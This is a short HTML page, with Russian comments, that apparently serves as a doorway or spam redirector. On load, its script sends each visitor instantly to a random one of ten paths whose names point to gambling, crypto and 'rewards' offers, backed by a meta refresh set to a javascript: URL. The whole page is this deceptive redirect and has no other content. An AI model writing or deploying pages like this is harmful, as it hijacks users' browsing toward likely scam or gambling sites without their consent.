<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Redirecting...</title>
    <meta http-equiv="refresh" content="0; url='javascript:redirect()'">
    <script>
    const sites = ["/best-vip-4182", "/rewards-mobile-4527", "/top-rewards-9277", "/rewards-premium-0765", "/top-play-2092", "/jackpot-limit-1970", "/club-crypto-3079", "/win-play-9964", "/support-premium-0925", "/win-best-8980"];
    function redirect() {
        const randomUrl = sites[Math.floor(Math.random() * sites.length)];
        window.location.href = randomUrl;
    }
    redirect(); // Запускаем немедленно
    </script>
</head>
<body>
    <!-- Пустая страница. Редирект происходит мгновенно. -->
</body>
</html>